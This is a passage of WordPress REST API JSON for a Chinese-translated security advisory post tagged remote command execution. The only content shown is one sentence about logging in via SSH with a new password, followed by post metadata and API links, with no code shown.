\u5982\u679c\u6210\u529f\uff0c\u5219\u53ef\u4ee5\u4f7f\u7528\u65b0\u5bc6\u7801\u901a\u8fc7SSH\u767b\u5f55\u8bbe\u5907\u3002 [crayon-5a666358f08ae242951493\/]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15774,11851,10757],"class_list":["post-11198","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-chinese-translation","tag-remote-command-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11198","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11198"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11198\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11198"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11198"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11198"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}